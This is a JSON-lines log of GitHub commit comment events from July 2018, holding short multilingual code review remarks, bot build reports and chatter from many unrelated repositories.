{"id":"8008997481","type":"CommitCommentEvent","actor":{"login":"BlazDT"},"repo":{"name":"AdguardTeam/AdguardFilters"},"payload":{"comment":{"id":29811558,"position":null,"line":null,"path":null,"commit_id":"959ae4e1472642be49357552dba867c43c17253f","created_at":"2018-07-24T09:38:24Z","updated_at":"2018-07-24T09:38:24Z","author_association":"CONTRIBUTOR","body":"Correct, fixed."}},"created_at":"2018-07-24T09:38:24Z"}
{"id":"8009000330","type":"CommitCommentEvent","actor":{"login":"MarisLi"},"repo":{"name":"ESpeakTeam3/ESpeak"},"payload":{"comment":{"id":29811568,"position":null,"line":null,"path":null,"commit_id":"3a158f7341b7272009c03c51b5addfe7630e5f25","created_at":"2018-07-24T09:38:56Z","updated_at":"2018-07-24T09:38:56Z","author_association":"CONTRIBUTOR","body":"Listeners should be in EventHandler class"}},"created_at":"2018-07-24T09:38:56Z"}
{"id":"8009000636","type":"CommitCommentEvent","actor":{"login":"sol-nikita"},"repo":{"name":"crptteam/react-pagination"},"payload":{"comment":{"id":29811569,"position":32,"line":41,"path":"src/components/Pagination.js","commit_id":"8ea5cb6add959feec46add82f595ecabdf50d285","created_at":"2018-07-24T09:38:59Z","updated_at":"2018-07-24T09:38:59Z","author_association":"NONE","body":"В приложении возникла ошибка на этой строке. fontSize нет в undefined;"}},"created_at":"2018-07-24T09:38:59Z"}
{"id":"8009000794","type":"CommitCommentEvent","actor":{"login":"jorgegonzalez"},"repo":{"name":"jorgegonzalez/zoe"},"payload":{"comment":{"id":29811570,"position":null,"line":null,"path":null,"commit_id":"71a1d9e5586ddd6475e4abf356c49852a0a9407a","created_at":"2018-07-24T09:39:01Z","updated_at":"2018-07-24T09:39:01Z","author_association":"OWNER","body":"We don’t need it here anymore as bin/zoe.js is the new entry point."}},"created_at":"2018-07-24T09:39:01Z"}
{"id":"8009001667","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811572,"position":94,"line":80,"path":"order/views.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:39:11Z","updated_at":"2018-07-24T09:39:11Z","author_association":"NONE","body":"вообще лучне ничего не удалять из базы. Лучше сделать статус \"deleted\" у order. и если прихрдит этот метод, то просто присваивать этот статус order"}},"created_at":"2018-07-24T09:39:11Z"}
{"id":"8009005561","type":"CommitCommentEvent","actor":{"login":"hynra"},"repo":{"name":"pptik/absensi-machine-mqtt-esp8266"},"payload":{"comment":{"id":29811579,"position":null,"line":null,"path":null,"commit_id":"4d98fe3d2cff65420d3956b0b16ea8a1cf406feb","created_at":"2018-07-24T09:39:53Z","updated_at":"2018-07-24T09:39:53Z","author_association":"MEMBER","body":"Mantapppppppppsxsxsx"}},"created_at":"2018-07-24T09:39:53Z"}
{"id":"8009005611","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811580,"position":24,"line":24,"path":"lesson2/buyers_list.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:39:53Z","updated_at":"2018-07-24T09:39:53Z","author_association":"NONE","body":"рекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\nк примеру данные переменные лучше было бы назвать |title, details|"}},"created_at":"2018-07-24T09:39:53Z"}
{"id":"8009006637","type":"CommitCommentEvent","actor":{"login":"wopian"},"repo":{"name":"chrislgarry/Apollo-11"},"payload":{"comment":{"id":29811583,"position":null,"line":null,"path":null,"commit_id":"8758a99662f839ee8782f6b3bed9abc4d1bf59ea","created_at":"2018-07-24T09:40:04Z","updated_at":"2018-07-24T09:40:04Z","author_association":"COLLABORATOR","body":"Missed when reviewing https://github.com/chrislgarry/Apollo-11/pull/341"}},"created_at":"2018-07-24T09:40:04Z"}
{"id":"8009006916","type":"CommitCommentEvent","actor":{"login":"msdundar"},"repo":{"name":"omu/nokul"},"payload":{"comment":{"id":29811584,"position":6,"line":36,"path":"app/models/curriculums/course.rb","commit_id":"c96d9be96b6ce3fe6e7f40a1abf1bf38084a28a8","created_at":"2018-07-24T09:40:07Z","updated_at":"2018-07-24T09:40:07Z","author_association":"MEMBER","body":"#66'yi kapatmayi unutmayalim"}},"created_at":"2018-07-24T09:40:07Z"}
{"id":"8009008434","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811587,"position":98,"line":84,"path":"order/views.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:40:22Z","updated_at":"2018-07-24T09:40:22Z","author_association":"NONE","body":"Я уже говорила views должна быть как можно тоньше. Все проверки стоит вынести в serializer в этом случае, или в forms.py"}},"created_at":"2018-07-24T09:40:22Z"}
{"id":"8009012790","type":"CommitCommentEvent","actor":{"login":"azdanov"},"repo":{"name":"jorgegonzalez/zoe"},"payload":{"comment":{"id":29811598,"position":null,"line":null,"path":null,"commit_id":"71a1d9e5586ddd6475e4abf356c49852a0a9407a","created_at":"2018-07-24T09:41:13Z","updated_at":"2018-07-24T09:41:13Z","author_association":"COLLABORATOR","body":"Oh.. Then there is some other reason why `v.1.9.5` doesn't work.\r\n\r\nTravis has some issues running `yarn lint`."}},"created_at":"2018-07-24T09:41:13Z"}
{"id":"8009014169","type":"CommitCommentEvent","actor":{"login":"tianjun3"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29811602,"position":2,"line":2,"path":"respo/config-client-dev.properties","commit_id":"00d32612a38898781bce791a4a845e60a7fbdb4e","created_at":"2018-07-24T09:41:28Z","updated_at":"2018-07-24T09:41:28Z","author_association":"NONE","body":"foo = foo version 44"}},"created_at":"2018-07-24T09:41:28Z"}
{"id":"8009016247","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29811610,"position":15,"line":39,"path":"test/TestCaseMacro.hx","commit_id":"197b652f4811f6b27ded7627e905d282cd1cc107","created_at":"2018-07-24T09:41:52Z","updated_at":"2018-07-24T09:41:52Z","author_association":"MEMBER","body":"Bonus: I had to fix curly formatting with expression reification :)"}},"created_at":"2018-07-24T09:41:52Z"}
{"id":"8009020367","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29811617,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-24T09:42:35Z","updated_at":"2018-07-24T09:42:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T09:42:35Z"}
{"id":"8009022297","type":"CommitCommentEvent","actor":{"login":"vujevits"},"repo":{"name":"helmethair-co/go-ethereum"},"payload":{"comment":{"id":29811627,"position":12,"line":307,"path":"cmd/swarm/config.go","commit_id":"68f535c62855b96d8791d781ce1207b9a30f8504","created_at":"2018-07-24T09:42:55Z","updated_at":"2018-07-24T09:42:55Z","author_association":"NONE","body":"when is something all lowercase?"}},"created_at":"2018-07-24T09:42:55Z"}
{"id":"8009024849","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29811634,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-24T09:43:23Z","updated_at":"2018-07-24T09:43:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T09:43:23Z"}
{"id":"8009025569","type":"CommitCommentEvent","actor":{"login":"msimonin"},"repo":{"name":"eltrufas/enoslib"},"payload":{"comment":{"id":29811637,"position":5,"line":65,"path":"enoslib/infra/enos_chameleonbaremetal/provider.py","commit_id":"43f342c85e26293d8d1697fe889e0206c160da2f","created_at":"2018-07-24T09:43:31Z","updated_at":"2018-07-24T09:43:31Z","author_association":"NONE","body":"Hi, don't hesitate to open some pull requests for all your improvements."}},"created_at":"2018-07-24T09:43:31Z"}
{"id":"8009027873","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811641,"position":28,"line":28,"path":"lesson2/date.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:43:54Z","updated_at":"2018-07-24T09:43:54Z","author_association":"NONE","body":"такиe вещи\r\n```\r\ncount_days_in_months = count_days_in_months + months[i]\r\n```\r\nможно писать так\r\n```\r\ncount_days_in_months += months[i]\r\n```"}},"created_at":"2018-07-24T09:43:54Z"}
{"id":"8009029825","type":"CommitCommentEvent","actor":{"login":"AnthonyLim23"},"repo":{"name":"mantidproject/fitbenchmarking"},"payload":{"comment":{"id":29811648,"position":null,"line":null,"path":null,"commit_id":"97b168ededb690ad1935b39befa4b27a4eef0ff7","created_at":"2018-07-24T09:44:15Z","updated_at":"2018-07-24T09:44:15Z","author_association":"COLLABORATOR","body":"you could also try rounding the result to less significant figures"}},"created_at":"2018-07-24T09:44:15Z"}
{"id":"8009030246","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29811649,"position":23,"line":23,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"be917a850a791abbdc4b9d0a3b87273425f0e297","created_at":"2018-07-24T09:44:20Z","updated_at":"2018-07-24T09:44:20Z","author_association":"OWNER","body":"Номер Вагона не сответствует формату\r\nВроде формат задаю правильный,,,"}},"created_at":"2018-07-24T09:44:20Z"}
{"id":"8009031204","type":"CommitCommentEvent","actor":{"login":"amitaibu"},"repo":{"name":"Gizra/elm-restful"},"payload":{"comment":{"id":29811654,"position":19,"line":860,"path":"src/Restful/Login.elm","commit_id":"61143b7c29f6d91e13cac2f4d6f54a24487c5d38","created_at":"2018-07-24T09:44:30Z","updated_at":"2018-07-24T09:44:30Z","author_association":"MEMBER","body":"I think this should be `, userAndData = loggedOut ()`, right?"}},"created_at":"2018-07-24T09:44:30Z"}
{"id":"8009033613","type":"CommitCommentEvent","actor":{"login":"zwymic00"},"repo":{"name":"zwymic00/planets"},"payload":{"comment":{"id":29811665,"position":null,"line":null,"path":null,"commit_id":"e1579019693d32d41534179da3fca94c0f1a0e8c","created_at":"2018-07-24T09:44:58Z","updated_at":"2018-07-24T09:44:58Z","author_association":"OWNER","body":"lkjök"}},"created_at":"2018-07-24T09:44:58Z"}
{"id":"8009034338","type":"CommitCommentEvent","actor":{"login":"vujevits"},"repo":{"name":"helmethair-co/go-ethereum"},"payload":{"comment":{"id":29811670,"position":11,"line":104,"path":"swarm/network/protocol.go","commit_id":"68f535c62855b96d8791d781ce1207b9a30f8504","created_at":"2018-07-24T09:45:07Z","updated_at":"2018-07-24T09:45:07Z","author_association":"NONE","body":"is there a protocol version which should be bumped? "}},"created_at":"2018-07-24T09:45:07Z"}
{"id":"8009038434","type":"CommitCommentEvent","actor":{"login":"B0RYS"},"repo":{"name":"Luka967/CSSockets"},"payload":{"comment":{"id":29811683,"position":null,"line":null,"path":null,"commit_id":"03291fd4d08037cb2f0b6923171f8cac01867ab7","created_at":"2018-07-24T09:45:51Z","updated_at":"2018-07-24T09:45:51Z","author_association":"NONE","body":"Hi this is a very good update, it has made my web app 100x more efficient"}},"created_at":"2018-07-24T09:45:51Z"}
{"id":"8009040925","type":"CommitCommentEvent","actor":{"login":"msdundar"},"repo":{"name":"omu/nokul"},"payload":{"comment":{"id":29811686,"position":5,"line":9,"path":"app/models/curriculums/course_share.rb","commit_id":"d7e002e304c83cd9afe9378ecb7944e1fce2741e","created_at":"2018-07-24T09:46:18Z","updated_at":"2018-07-24T09:46:18Z","author_association":"MEMBER","body":"CourseShare ders havuzu mu oluyor? Eger oyleyse daha guzel bir isim bulalim bu modele. Eger oyle degilse sanki burada bir de donem bilgisi olmali cunku bir ders farkli yillarda ayni birime birden cok kez acilabilir."}},"created_at":"2018-07-24T09:46:18Z"}
{"id":"8009043911","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29811696,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-24T09:46:51Z","updated_at":"2018-07-24T09:46:51Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-24T09:46:51Z"}
{"id":"8009046549","type":"CommitCommentEvent","actor":{"login":"pavlots"},"repo":{"name":"myparcelnl/sdk"},"payload":{"comment":{"id":29811703,"position":null,"line":null,"path":null,"commit_id":"0b122ea7647dba5dd519c78f50c90fa2c0929ab1","created_at":"2018-07-24T09:47:20Z","updated_at":"2018-07-24T09:47:20Z","author_association":"NONE","body":"It is used in https://github.com/myparcelnl/magento/blob/master/Block/Sales/OrderAction.php"}},"created_at":"2018-07-24T09:47:20Z"}
{"id":"8009048614","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"regardscitoyens/the-law-factory-parser"},"payload":{"comment":{"id":29811713,"position":null,"line":null,"path":null,"commit_id":"d960662a09186d70aedc0e41b1803fbb097eeb8e","created_at":"2018-07-24T09:47:43Z","updated_at":"2018-07-24T09:47:43Z","author_association":"MEMBER","body":"@teymour ce commit supprime les fichiers d'interventions pour chaque séance vu qu'ils ne sont pas utilisés au final. Le déclencheur c'est que les groupes des sénateurs peuvent bouger et ceux-ci ne sont pas encore historisés sur NosSénateurs. Du coup, vu qu'on corrige ca dans interventions.json, ca produisait des fichiers contradictoires.\r\n\r\nMais je retiens que ce serait utile d'avoir un répertoire contenant toutes les données de chaque dossier, même celles intermédiaires."}},"created_at":"2018-07-24T09:47:43Z"}
{"id":"8009048616","type":"CommitCommentEvent","actor":{"login":"govjess"},"repo":{"name":"MARKETProtocol/dApp"},"payload":{"comment":{"id":29811714,"position":1,"line":1,"path":"src/components/SimExchange/Columns.js","commit_id":"6046e39b218b4755d97eb967fde05ec32cee6a62","created_at":"2018-07-24T09:47:43Z","updated_at":"2018-07-24T09:47:43Z","author_association":"NONE","body":"Export and import "}},"created_at":"2018-07-24T09:47:43Z"}
{"id":"8009059554","type":"CommitCommentEvent","actor":{"login":"drinkmorewaters"},"repo":{"name":"drinkmorewaters/crystalplayapp"},"payload":{"comment":{"id":29811754,"position":null,"line":null,"path":null,"commit_id":"8ebe40c926df53135898d86e7150b824d573b723","created_at":"2018-07-24T09:49:44Z","updated_at":"2018-07-24T09:49:44Z","author_association":"OWNER","body":"Crystal Play OSX APP Including ICON for other developers"}},"created_at":"2018-07-24T09:49:44Z"}
{"id":"8009059594","type":"CommitCommentEvent","actor":{"login":"konimex"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29811755,"position":null,"line":null,"path":null,"commit_id":"d2eaf861e67652397fa18fce8e86076743433992","created_at":"2018-07-24T09:49:44Z","updated_at":"2018-07-24T09:49:44Z","author_association":"MEMBER","body":"Any particular reason to add a -git package to [world]? A stable package is already available in [galaxy]."}},"created_at":"2018-07-24T09:49:44Z"}
{"id":"8009064225","type":"CommitCommentEvent","actor":{"login":"TakuyaHarayama"},"repo":{"name":"OITA-CREATIVE-ACADEMY/lesson-04-weather-app"},"payload":{"comment":{"id":29811767,"position":13,"line":13,"path":"index.html","commit_id":"674e09c5c110b84b7384cf46a7722dc3b235192b","created_at":"2018-07-24T09:50:32Z","updated_at":"2018-07-24T09:50:32Z","author_association":"CONTRIBUTOR","body":"見た目をわかりやすくするために `bootstrap`を使っていますが、今回の内容では使わなくてOKです。"}},"created_at":"2018-07-24T09:50:32Z"}
{"id":"8009075836","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"AlexSensei/testRepo"},"payload":{"comment":{"id":29811791,"position":18,"line":18,"path":"blog/routes/web.php","commit_id":"ce21d69c0c857b84c3660214ebac3a7b204fbcd7","created_at":"2018-07-24T09:52:39Z","updated_at":"2018-07-24T09:52:39Z","author_association":"NONE","body":"Fali space izmedju `function` i `()`\r\nTrudi se da budes konzistentan :) \r\n\r\nOvo je style guide koji ovde koristimo: https://www.php-fig.org/psr/psr-2/\r\n"}},"created_at":"2018-07-24T09:52:39Z"}
{"id":"8009076853","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29811792,"position":70,"line":69,"path":"BsuirFind.Foundation/Services/GameService.cs","commit_id":"520cbb750cc4819b3f55e634f4e1283f5a904b26","created_at":"2018-07-24T09:52:50Z","updated_at":"2018-07-24T09:52:50Z","author_association":"COLLABORATOR","body":"@zaq007 інгліш, мазафака, ду ю спік іт?\r\n\r\nHere we should calculate differences between trick and task collections for this game in DB and add/delete/update them respectively."}},"created_at":"2018-07-24T09:52:50Z"}
{"id":"8009077623","type":"CommitCommentEvent","actor":{"login":"TakuyaHarayama"},"repo":{"name":"OITA-CREATIVE-ACADEMY/lesson-04-weather-app"},"payload":{"comment":{"id":29811795,"position":29,"line":29,"path":"index.html","commit_id":"674e09c5c110b84b7384cf46a7722dc3b235192b","created_at":"2018-07-24T09:52:58Z","updated_at":"2018-07-24T09:52:58Z","author_association":"CONTRIBUTOR","body":"郵便番号を入力するフォームを用意します。\r\n`form`タグの中に `input`タグを書きました。\r\nまた、JSから要素を操作するために `id=\"zipcode\"`というidをつけています。\r\nさらに `value`を使うことで初期値の設定ができ、 `autofocus`を使うことでページ表示時に自動的にフォーカスが当たるようにしています。"}},"created_at":"2018-07-24T09:52:58Z"}
{"id":"8009078681","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811799,"position":28,"line":28,"path":"lesson2/date.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:53:11Z","updated_at":"2018-07-24T09:53:11Z","author_association":"NONE","body":"Но при этом решении у нас вводятся аж 4 переменные помимо дня месяца и года.\r\n+day_count = 0\r\n+count = 0\r\n+count_days_in_months = 0\r\n+i = 0\r\nнас ведь интересует только кол-во дней. Давай попробуем решить без всех этих лишних деталей. Стоит посмотреть например в сторону sum для массивов"}},"created_at":"2018-07-24T09:53:11Z"}
{"id":"8009079088","type":"CommitCommentEvent","actor":{"login":"zehuawong"},"repo":{"name":"zehuawong/GitTest"},"payload":{"comment":{"id":29811800,"position":2,"line":3,"path":"README.md","commit_id":"ec1dba991a8c9c0627597b49aa58207231913534","created_at":"2018-07-24T09:53:15Z","updated_at":"2018-07-24T09:53:15Z","author_association":"OWNER","body":"2018-7-24"}},"created_at":"2018-07-24T09:53:15Z"}
{"id":"8009081938","type":"CommitCommentEvent","actor":{"login":"vujevits"},"repo":{"name":"helmethair-co/go-ethereum"},"payload":{"comment":{"id":29811804,"position":11,"line":104,"path":"swarm/network/protocol.go","commit_id":"68f535c62855b96d8791d781ce1207b9a30f8504","created_at":"2018-07-24T09:53:46Z","updated_at":"2018-07-24T09:53:46Z","author_association":"NONE","body":"based on the tests I suppose the current version is 5. In my understanding we should not allow light nodes to connect to nodes which don't know about the fact that they shouldn't send requests to light nodes."}},"created_at":"2018-07-24T09:53:46Z"}
{"id":"8009082288","type":"CommitCommentEvent","actor":{"login":"TakuyaHarayama"},"repo":{"name":"OITA-CREATIVE-ACADEMY/lesson-04-weather-app"},"payload":{"comment":{"id":29811806,"position":31,"line":31,"path":"index.html","commit_id":"674e09c5c110b84b7384cf46a7722dc3b235192b","created_at":"2018-07-24T09:53:50Z","updated_at":"2018-07-24T09:53:50Z","author_association":"CONTRIBUTOR","body":"検索ボタンがクリックされたときにJSを実行するために `id=\"btn-search\"`を指定しています。"}},"created_at":"2018-07-24T09:53:50Z"}
{"id":"8009083380","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/the-law-factory-parser"},"payload":{"comment":{"id":29811811,"position":null,"line":null,"path":null,"commit_id":"d960662a09186d70aedc0e41b1803fbb097eeb8e","created_at":"2018-07-24T09:54:02Z","updated_at":"2018-07-24T09:54:02Z","author_association":"CONTRIBUTOR","body":"C'est la continuation logique de ce qui avait déjà été enclenché en retirant aussi les fichiers des amendements issus de ND/NS du dossier procedure.\r\nSur le long terme je suis d'accord que ce serait bien de retrouver les données complètes des amendements et interventions dans procedure pour chaque étape, mais vu qu'il y a pas mal de renettoyage opéré dans tlfp, je préférerai qu'on y remette des données nettoyées plutôt que de coller les données directement tirées de l'API ND/NS"}},"created_at":"2018-07-24T09:54:02Z"}
{"id":"8009084824","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"AlexSensei/testRepo"},"payload":{"comment":{"id":29811817,"position":26,"line":26,"path":"blog/app/Http/Controllers/HomeController.php","commit_id":"d1cf49393525e18cd37b2f6058edf99aacdaff46","created_at":"2018-07-24T09:54:17Z","updated_at":"2018-07-24T09:54:17Z","author_association":"NONE","body":"Usaglasi navodnike, gore se koriste jednostruki, dole dvostruki. "}},"created_at":"2018-07-24T09:54:17Z"}
{"id":"8009085038","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29811819,"position":22,"line":22,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-24T09:54:20Z","updated_at":"2018-07-24T09:54:20Z","author_association":"NONE","body":"Refer to the \"info only\" comment below."}},"created_at":"2018-07-24T09:54:20Z"}
{"id":"8009085179","type":"CommitCommentEvent","actor":{"login":"guims1978"},"repo":{"name":"BNB48Club/BNB48Club.github.io"},"payload":{"comment":{"id":29811821,"position":null,"line":null,"path":null,"commit_id":"5cec24e3be497350f3d1fe8761ececc440ea4d0a","created_at":"2018-07-24T09:54:21Z","updated_at":"2018-07-24T09:54:21Z","author_association":"COLLABORATOR","body":"[**2018.7.21 韩国区块链会议，芭比财经主办 关键词 币安核心团队齐聚首尔，透露了些什么新动向 ，CFO 周玮首次亮相**](https://mp.weixin.qq.com/s?__biz=MzIwMzk1OTc0MA==&mid=2247487629&idx=2&sn=b0bb82f1695904ed3f282798a3ae7030&chksm=96c62c5ea1b1a548ac94d71ae65a8ed3392b4001a5a2645819c44f09b0248302903576c0e71e&mpshare=1&scene=1&srcid=0723k2ytzYLQSbfgPDbVNvRm#rd)\r\n"}},"created_at":"2018-07-24T09:54:21Z"}
{"id":"8009088344","type":"CommitCommentEvent","actor":{"login":"krutishindusa"},"repo":{"name":"krutishindusa/zenbot"},"payload":{"comment":{"id":29811829,"position":null,"line":null,"path":null,"commit_id":"be9f4a8560af25da49c8a6e627bbd39e461f9cb9","created_at":"2018-07-24T09:54:57Z","updated_at":"2018-07-24T09:54:57Z","author_association":"OWNER","body":"<context>\r\n  <input pattern=\"(hi|hello) *\">\r\n    <output value=\"Hi!\"/>\r\n  </input>\r\n</context>"}},"created_at":"2018-07-24T09:54:57Z"}
{"id":"8009088982","type":"CommitCommentEvent","actor":{"login":"zaq007"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29811831,"position":70,"line":69,"path":"BsuirFind.Foundation/Services/GameService.cs","commit_id":"520cbb750cc4819b3f55e634f4e1283f5a904b26","created_at":"2018-07-24T09:55:03Z","updated_at":"2018-07-24T09:55:03Z","author_association":"COLLABORATOR","body":"Yeah, It happens at lines 63-67\r\nBut line we are commenting is useless"}},"created_at":"2018-07-24T09:55:03Z"}
{"id":"8009092300","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811834,"position":2,"line":2,"path":"lesson2/fibonacci.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:55:35Z","updated_at":"2018-07-24T09:55:35Z","author_association":"NONE","body":"в условии сказано \"меньше 100\". Не нужно считать за программу. Стоит добавить переменную вне цикла, которая будет хранить последнее значение и сравнивать эту переменную с сотней здесь. А дальше инкрементировать ее внутри цикла"}},"created_at":"2018-07-24T09:55:35Z"}
{"id":"8009092440","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_CM"},"payload":{"comment":{"id":29811835,"position":null,"line":null,"path":null,"commit_id":"dd4be1354ec93682913f81751f491c23f97414fe","created_at":"2018-07-24T09:55:37Z","updated_at":"2018-07-24T09:55:37Z","author_association":"NONE","body":"Even better ;)"}},"created_at":"2018-07-24T09:55:37Z"}
{"id":"8009094391","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811838,"position":3,"line":3,"path":"lesson2/fibonacci.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:55:57Z","updated_at":"2018-07-24T09:55:57Z","author_association":"NONE","body":"пробелы вокруг плюса нужны"}},"created_at":"2018-07-24T09:55:57Z"}
{"id":"8009101765","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811856,"position":1,"line":1,"path":"lesson2/months.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:57:16Z","updated_at":"2018-07-24T09:57:16Z","author_association":"NONE","body":"для лучшей читаемости длинные хеши часто пишут вот так:\r\n```\r\nhash = {\r\n  a: 1,\r\n  b: 2,\r\n  c: 3,\r\n  d: 4,\r\n  e: 5\r\n}\r\n```\r\nили вот так:\r\n```\r\nhash = {\r\n  a: 1, b: 2, c: 3,\r\n  d: 4, e: 5\r\n}\r\n```\r\nдаже вот так:\r\n```\r\nhash = { a: 1, b: 2, c: 3,\r\n         d: 4, e: 5 }\r\n```\r\nхотя последний вариант наименее предпочитаемый"}},"created_at":"2018-07-24T09:57:16Z"}
{"id":"8009102932","type":"CommitCommentEvent","actor":{"login":"ReyAyanami"},"repo":{"name":"osonovaakylai/test"},"payload":{"comment":{"id":29811859,"position":16,"line":18,"path":"src/test/test.js","commit_id":"d23c8d8d6c4de72a2bf8dbb1f4a238b646daca69","created_at":"2018-07-24T09:57:26Z","updated_at":"2018-07-24T09:57:26Z","author_association":"CONTRIBUTOR","body":"try to get rid of mutable methods and forEach. consider to use reduce, filter"}},"created_at":"2018-07-24T09:57:26Z"}
{"id":"8009105511","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29811864,"position":26,"line":26,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-24T09:57:55Z","updated_at":"2018-07-24T09:57:55Z","author_association":"NONE","body":"Yes. Storage proper is very expensive so you should save it for core computation. Events can be used as cheap storage for external systems.\r\nAlso, the Ethereum research foundation is looking at _storage rent_, or how to pay full nodes for keeping the current state, however old. "}},"created_at":"2018-07-24T09:57:55Z"}
